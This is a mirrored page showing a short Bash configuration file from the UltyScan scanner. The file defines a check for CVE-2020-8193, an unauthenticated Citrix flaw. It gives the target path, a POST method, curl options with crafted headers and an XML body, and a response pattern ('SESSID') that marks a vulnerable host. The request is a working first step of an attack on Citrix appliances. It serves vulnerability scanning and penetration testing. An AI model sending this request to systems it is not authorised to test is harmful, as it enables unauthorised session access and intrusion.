mirror of
https://github.com/DeNNiiInc/UltyScan.git
synced 2026-04-17 22:46:00 +00:00
9 lines
560 B
Bash
9 lines
560 B
Bash
AUTHOR='@xer0dayz'
|
|
VULN_NAME='CVE-2020-8193 - Citrix Unauthenticated LFI'
|
|
URI="/pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1"
|
|
METHOD='POST'
|
|
MATCH="SESSID"
|
|
SEVERITY='P1 - CRITICAL'
|
|
CURL_OPTS="--user-agent '' -s --insecure -H 'Cookie: startupapp=st' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Content-Type: application/xml' -H 'X-NITRO-USER: xpyZxwy6' -H 'X-NITRO-PASS: xWXHUJ56' -I --data '<appfwprofile><login></login></appfwprofile>'"
|
|
SECONDARY_COMMANDS=''
|
|
GREP_OPTIONS='-i' |